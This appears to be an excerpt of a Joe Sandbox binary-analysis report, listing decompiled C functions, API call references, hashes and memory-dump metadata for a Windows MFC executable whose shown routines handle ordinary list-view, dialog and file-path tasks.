Instruction ID: ea08e793f1d993dd3ef116a24dd6f5d6beddd1dc992f25bdafc2d8108c191232
Opcode Fuzzy Hash: 27ad6c7944b5bfc154fb365c62b5ce0f969e24aa8315b1577fc0499fea43e056
Instruction Fuzzy Hash: C1E0D8F374131076D1206166ACC6EC7A25C9F8C750F00651BB706650D286E46440C6B4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED90, Relevance: 6.0, APIs: 4, Instructions: 29
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040ED90(void* __ecx, intOrPtr _a4, signed int* _a8) {
				signed int* _t8;
				intOrPtr _t14;
				void* _t16;

				_t14 = _a4;
				_t16 = __ecx;
				if( *((short*)(_t14 + 0xc)) == 0x2e) {
					E0040ED20(__ecx);
				}
				if( *((short*)(_t14 + 0xc)) == 0x71) {
					L0043DF9A();
					_push(SendMessageA( *(_t16 + 0x248), 0x1017, SendMessageA( *(_t16 + 0x248), 0x100c, 0xffffffff, 2), 0));
					L0043DD9C();
				}
				_t8 = _a8;
				 *_t8 =  *_t8 & 0x00000000;
				return _t8;
			}

0x0040ed92
0x0040ed96
0x0040ed9d
0x0040ed9f
0x0040ed9f
0x0040eda9
0x0040edb1
0x0040eddd
0x0040edde
0x0040edde
0x0040ede3
0x0040ede9
0x0040edec

APIs

#5981.MFC42 ref: 0040EDB1
SendMessageA.USER32(?,0000100C,000000FF,00000002), ref: 0040EDCB
SendMessageA.USER32(?,00001017,00000000,00000000), ref: 0040EDDB
#2864.MFC42(00000000), ref: 0040EDDE

Part of subcall function 0040ED20: SendMessageA.USER32(?,0000100C,000000FF,00000002), ref: 0040ED3B
Part of subcall function 0040ED20: SendMessageA.USER32(?,00001008,00000000,00000000), ref: 0040ED51
Part of subcall function 0040ED20: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040ED60
Part of subcall function 0040ED20: #4055.MFC42(00000421), ref: 0040ED6E
Part of subcall function 0040ED20: #3092.MFC42(00000421,00000421), ref: 0040ED7A
Part of subcall function 0040ED20: SendMessageA.USER32(?,000000F5,00000000,00000000), ref: 0040ED89

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: MessageSend$#2864#3092#4055#5981
String ID:
API String ID: 2969049274-0
Opcode ID: 739a2a9b338157b2c19ea0bc97e000aefbe7e5df23c05ac39721daea940fb8e6
Instruction ID: d456cf7f0d0394f52ce11dd12a4313192f647fbef472a737afac07924053a22e
Opcode Fuzzy Hash: 739a2a9b338157b2c19ea0bc97e000aefbe7e5df23c05ac39721daea940fb8e6
Instruction Fuzzy Hash: CEF08235500201BAD720B726CC09F97B7A4EF95730F018A2AF0A4271E18BF8A8918B54

Uniqueness

Uniqueness Score: -1.00%

Function 0041B155, Relevance: 6.0, APIs: 4, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041B155(intOrPtr* __ecx) {
				void* __esi;
				void* _t14;
				void* _t15;
				intOrPtr* _t25;
				void* _t27;

				_t14 = E0043E4E0(0x441505, _t27);
				_push(__ecx);
				_t25 = __ecx;
				_push( *((intOrPtr*)(_t27 + 8)));
				 *((intOrPtr*)(_t27 - 0x10)) = __ecx;
				_push(0x9c);
				L0043E054();
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				L0043DDD8();
				 *(_t27 - 4) = 1;
				L0043DDD8();
				 *(_t27 - 4) = 2;
				_t15 = L00404F04(_t14, __ecx + 0x68, __ecx);
				 *(_t27 - 4) = 3;
				L00404F04(_t15, _t25 + 0xbc, _t25);
				 *_t25 = 0x4481d8;
				 *[fs:0x0] =  *((intOrPtr*)(_t27 - 0xc));
				return _t25;
			}

0x0041b15a
0x0041b15f
0x0041b161
0x0041b163
0x0041b166
0x0041b169
0x0041b16e
0x0041b173
0x0041b17a
0x0041b182
0x0041b186
0x0041b18e
0x0041b192
0x0041b19d
0x0041b1a1
0x0041b1a9
0x0041b1b2
0x0041b1ba

APIs

__EH_prolog.LIBCMT ref: 0041B15A
#324.MFC42(0000009C,?), ref: 0041B16E
#540.MFC42(0000009C,?), ref: 0041B17A
#540.MFC42(0000009C,?), ref: 0041B186

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #540$#324H_prolog
String ID:
API String ID: 3562008183-0
Opcode ID: 3dd3591440da0e25f81b5b0682d1b714da6aaedd8160af54c0b021f2c40be7c1
Instruction ID: ef707f19ad6a08d9c4ad0f5789fc181c3eda3ff2b87b53743e1f4ea964f79581
Opcode Fuzzy Hash: 3dd3591440da0e25f81b5b0682d1b714da6aaedd8160af54c0b021f2c40be7c1
Instruction Fuzzy Hash: 19F09670800354DAD715EB96C4057DDFBA4EF55308F00445FA592533C1CBB86604C765

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB16, Relevance: 6.0, APIs: 4, Instructions: 28
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040CB16(void* __ecx, long _a4) {
				struct HWND__* _t8;
				long _t9;
				void* _t16;

				_t16 = __ecx;
				_t8 = __ecx + 0x54;
				if(_t8 != 0) {
					_t8 =  *(_t8 + 0x20);
				}
				_t9 = IsWindow(_t8);
				if(_t9 != 0) {
					SendMessageA( *(_t16 + 0x74), 0x401,  *(_t16 + 0x4c), 0);
					_t9 = SendMessageA( *(_t16 + 0x74), 0x407, 0, _a4);
				}
				_push(_a4);
				L0043DE56();
				return _t9;
			}

0x0040cb17
0x0040cb19
0x0040cb1e
0x0040cb20
0x0040cb20
0x0040cb24
0x0040cb2c
0x0040cb42
0x0040cb52
0x0040cb54
0x0040cb55
0x0040cb5b
0x0040cb61

APIs

IsWindow.USER32(?), ref: 0040CB24
SendMessageA.USER32(?,00000401,?,00000000), ref: 0040CB42
SendMessageA.USER32(?,00000407,00000000,?), ref: 0040CB52
#5290.MFC42(?), ref: 0040CB5B

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: MessageSend$#5290Window
String ID:
API String ID: 2009533309-0
Opcode ID: 078b3cc101cc111d8e05528d6d39dbb61a2830ad59f0643d034878042470fa38
Instruction ID: 08778518366ae116c407e6a6e09f8c34a8fcd9fccba00ab34aa36d1efeffccb3
Opcode Fuzzy Hash: 078b3cc101cc111d8e05528d6d39dbb61a2830ad59f0643d034878042470fa38
Instruction Fuzzy Hash: F8F03075240710ABDB325B21EC06F177FA9ABC4B10F01492AF741A65B0C675E811DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041BB1C, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E0041BB1C(void* __ecx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;

				_t9 = _a4;
				_push(__ecx + 0x178);
				_push(0x46b);
				_push(_t9);
				L0043E084();
				_push(__ecx + 0x17c);
				_push(0x46c);
				_push(_t9);
				L0043E084();
				_t7 = __ecx + 0x180;
				_push(_t7);
				_push(0x472);
				_push(_t9);
				L0043E084();
				_push(__ecx + 0x64);
				_push(0x496);
				_push(_t9);
				L0043DF7C();
				return _t7;
			}

0x0041bb20
0x0041bb2a
0x0041bb2b
0x0041bb30
0x0041bb31
0x0041bb3c
0x0041bb3d
0x0041bb42
0x0041bb43
0x0041bb48
0x0041bb4e
0x0041bb4f
0x0041bb54
0x0041bb55
0x0041bb5d
0x0041bb5e
0x0041bb63
0x0041bb64
0x0041bb6b

APIs

#2363.MFC42(?,0000046B,?), ref: 0041BB31
#2363.MFC42(?,0000046C,?,?,0000046B,?), ref: 0041BB43
#2363.MFC42(?,00000472,?,?,0000046C,?,?,0000046B,?), ref: 0041BB55
#2302.MFC42(?,00000496,?,?,00000472,?,?,0000046C,?,?,0000046B,?), ref: 0041BB64

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2363$#2302
String ID:
API String ID: 2762476921-0
Opcode ID: 003d0644b884f1b0b7f8d9f104167386385286eab5a0e01f24895d8e5b66e750
Instruction ID: 8a7b3a3323ab6f77b5ba709fa35b3f88c63dbaf64be6e66b52591d9e34ee506b
Opcode Fuzzy Hash: 003d0644b884f1b0b7f8d9f104167386385286eab5a0e01f24895d8e5b66e750
Instruction Fuzzy Hash: BCE0D8B210461079E110A1228C82DFB62BC8B8AB14F00842FF75992081D7D46806427B

Uniqueness

Uniqueness Score: -1.00%

Function 00419EC5, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00419EC5(void* __ecx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;

				_t9 = _a4;
				_push(__ecx + 0xd8);
				_push(0x43f);
				_push(_t9);
				L0043E05A();
				_push(__ecx + 0x68);
				_push(0x5360);
				_push(_t9);
				L0043DF7C();
				_t7 = __ecx + 0xdc;
				_push(_t7);
				_push(0x43e);
				_push(_t9);
				L0043E05A();
				_push(__ecx + 0xe0);
				_push(0x438);
				_push(_t9);
				L0043E05A();
				return _t7;
			}

0x00419ec9
0x00419ed3
0x00419ed4
0x00419ed9
0x00419eda
0x00419ee2
0x00419ee3
0x00419ee8
0x00419ee9
0x00419eee
0x00419ef4
0x00419ef5
0x00419efa
0x00419efb
0x00419f06
0x00419f07
0x00419f0c
0x00419f0d
0x00419f14

APIs

#2370.MFC42(?,0000043F,?), ref: 00419EDA
#2302.MFC42(?,00005360,?,?,0000043F,?), ref: 00419EE9
#2370.MFC42(?,0000043E,?,?,00005360,?,?,0000043F,?), ref: 00419EFB
#2370.MFC42(?,00000438,?,?,0000043E,?,?,00005360,?,?,0000043F,?), ref: 00419F0D

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2370$#2302
String ID:
API String ID: 1508513658-0
Opcode ID: 91f30eed1b7bf409dad361da95ad5f62090f6036068ce3a404b6c0fbfb77ec96
Instruction ID: b6ab4aefebf430eed64d219a753f7261dda29cc2a7646800f24bbce8132f5934
Opcode Fuzzy Hash: 91f30eed1b7bf409dad361da95ad5f62090f6036068ce3a404b6c0fbfb77ec96
Instruction Fuzzy Hash: F8E0D8B25412147AE114A2138C42FFBA2BC9B9AB14F40942FB708B20C0C6D86945C6B9

Uniqueness

Uniqueness Score: -1.00%

Function 0041B1D9, Relevance: 6.0, APIs: 4, Instructions: 26
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 92%

			E0041B1D9(intOrPtr __ecx) {
				void* __esi;
				void* _t15;
				void* _t16;
				void* _t17;
				intOrPtr _t26;
				void* _t28;

				_t15 = E0043E4E0(0x441539, _t28);
				_push(__ecx);
				_t26 = __ecx;
				 *((intOrPtr*)(_t28 - 0x10)) = __ecx;
				 *(_t28 - 4) = 3;
				_t16 = L00404F36(_t15, __ecx + 0xbc, __ecx);
				 *(_t28 - 4) = 2;
				_t17 = L00404F36(_t16, _t26 + 0x68, _t26);
				 *(_t28 - 4) = 1;
				L0043DD36();
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				L0043DD36();
				 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
				L0043E04E();
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return _t17;
			}

0x0041b1de
0x0041b1e3
0x0041b1e5
0x0041b1e7
0x0041b1f0
0x0041b1f7
0x0041b1ff
0x0041b203
0x0041b20b
0x0041b20f
0x0041b214
0x0041b21b
0x0041b220
0x0041b226
0x0041b22f
0x0041b237

APIs

__EH_prolog.LIBCMT ref: 0041B1DE
#800.MFC42(?,?,0041B1C5), ref: 0041B20F
#800.MFC42(?,?,0041B1C5), ref: 0041B21B
#641.MFC42(?,?,0041B1C5), ref: 0041B226

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#641H_prolog
String ID:
API String ID: 1638354951-0
Opcode ID: 4f3a489ff4af5a1852b5db4333cb4742ba022c5a176dfaf17a613d77197bf646
Instruction ID: 284fa1c7738a2b9c1b74bc2b2e01ffdeb2d263e76c0b2f643d19fe2dd0097ef4
Opcode Fuzzy Hash: 4f3a489ff4af5a1852b5db4333cb4742ba022c5a176dfaf17a613d77197bf646
Instruction Fuzzy Hash: 05F0B470811755DAD725EB65C1117DCF7B4AF59308F00464EA093632C2CBBC1B04C755

Uniqueness

Uniqueness Score: -1.00%

Function 0042A660, Relevance: 6.0, APIs: 4, Instructions: 26
stringCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042A660(CHAR* _a4, signed int _a8, signed int _a12) {
				int _t9;
				CHAR* _t17;

				_t17 = _a4;
				GetModuleFileNameA(0, _t17, 0x103);
				_t9 = lstrlenA(_t17);
				 *( &(_t17[_t9]) - lstrlenA( *(0x454cc8 + _a12 * 4))) =  *( &(_t17[_t9]) - lstrlenA( *(0x454cc8 + _a12 * 4))) & 0x00000000;
				return lstrcatA(_t17,  *(0x454cc8 + _a8 * 4));
			}

0x0042a663
0x0042a66f
0x0042a67c
0x0042a695
0x0042a6a9

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000103,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A66F
lstrlenA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A67C
lstrlenA.KERNEL32(?,00000000,?,00419205,?,00000005,00000000), ref: 0042A68B
lstrcatA.KERNEL32(?,?,00000000,?,00419205,?,00000005,00000000), ref: 0042A6A0

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: lstrlen$FileModuleNamelstrcat
String ID:
API String ID: 3539138998-0
Opcode ID: 88eac34868261a862fc189c44c7c0752cad0857385c762dd2e66d2a418fb607d
Instruction ID: 4fa30f24d761a70ba497462983a63b37b3979ec1d4adab30a876b654b1b47547
Opcode Fuzzy Hash: 88eac34868261a862fc189c44c7c0752cad0857385c762dd2e66d2a418fb607d
Instruction Fuzzy Hash: BBE0ED36204351ABC702DFA8EC89B5B7BA8EBCA716F050026F244D7261C7A19855DB66

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE9C, Relevance: 6.0, APIs: 4, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040CE9C(intOrPtr __ecx) {
				void* _t11;
				intOrPtr _t21;
				void* _t23;

				_t11 = E0043E4E0(0x43fe1d, _t23);
				_push(__ecx);
				_t21 = __ecx;
				 *((intOrPtr*)(_t23 - 0x10)) = __ecx;
				L0043DDD8();
				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
				L0043DDD8();
				 *(_t23 - 4) = 1;
				L0043DDD8();
				 *(_t23 - 4) = 2;
				 *((intOrPtr*)(__ecx)) = 0x4459f4;
				E0040C258(_t11, __ecx);
				 *[fs:0x0] =  *((intOrPtr*)(_t23 - 0xc));
				return _t21;
			}

0x0040cea1
0x0040cea6
0x0040cea8
0x0040ceaa
0x0040ceb0
0x0040ceb5
0x0040cebc
0x0040cec4
0x0040cec8
0x0040cecf
0x0040ced3
0x0040ced9
0x0040cee4
0x0040ceec

APIs

__EH_prolog.LIBCMT ref: 0040CEA1
#540.MFC42(?,?,0040CE35,?,?,00403F1E), ref: 0040CEB0
#540.MFC42(?,?,0040CE35,?,?,00403F1E), ref: 0040CEBC
#540.MFC42(?,?,0040CE35,?,?,00403F1E), ref: 0040CEC8

Part of subcall function 0040C258: #860.MFC42(00000000,?,?,0040CEDE,?,?,0040CE35,?,?,00403F1E), ref: 0040C26C
Part of subcall function 0040C258: #860.MFC42(00000000,00000000,?,?,0040CEDE,?,?,0040CE35,?,?,00403F1E), ref: 0040C275
Part of subcall function 0040C258: #860.MFC42(00000000,00000000,00000000,?,?,0040CEDE,?,?,0040CE35,?,?,00403F1E), ref: 0040C27E

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #540#860$H_prolog
String ID:
API String ID: 232038355-0
Opcode ID: a601537b0b99a7a612a0ccfe17b1e716f8bc20fcbf8f8a82aceb69941c1165fa
Instruction ID: 876a72559c078389570398e2d2bbff56812e97f2c4914021c36b2383cdf700e4
Opcode Fuzzy Hash: a601537b0b99a7a612a0ccfe17b1e716f8bc20fcbf8f8a82aceb69941c1165fa
Instruction Fuzzy Hash: 44F0A071D10254CBCB25EB95E4027ADB7B4AF18308F008A6FA053A36C2CBB85A08C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7B2, Relevance: 6.0, APIs: 4, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040B7B2(void* __ecx) {
				void* _t9;

				L0043DF94();
				_push( *((intOrPtr*)(__ecx + 0x64)) + 0x768);
				_push(0x42d);
				L0043E066();
				L0043E15C();
				_push( *( *((intOrPtr*)(__ecx + 0x64)) + 0x13f) & 0x000000ff);
				_push(0x421);
				L0043DF82();
				E0040B78F( *( *((intOrPtr*)(__ecx + 0x64)) + 0x13f) & 0x000000ff, __ecx);
				_t9 = 1;
				return _t9;
			}

0x0040b7b5
0x0040b7c4
0x0040b7c5
0x0040b7ca
0x0040b7d1
0x0040b7e2
0x0040b7e3
0x0040b7e8
0x0040b7ef
0x0040b7f6
0x0040b7f8

APIs

#4710.MFC42 ref: 0040B7B5
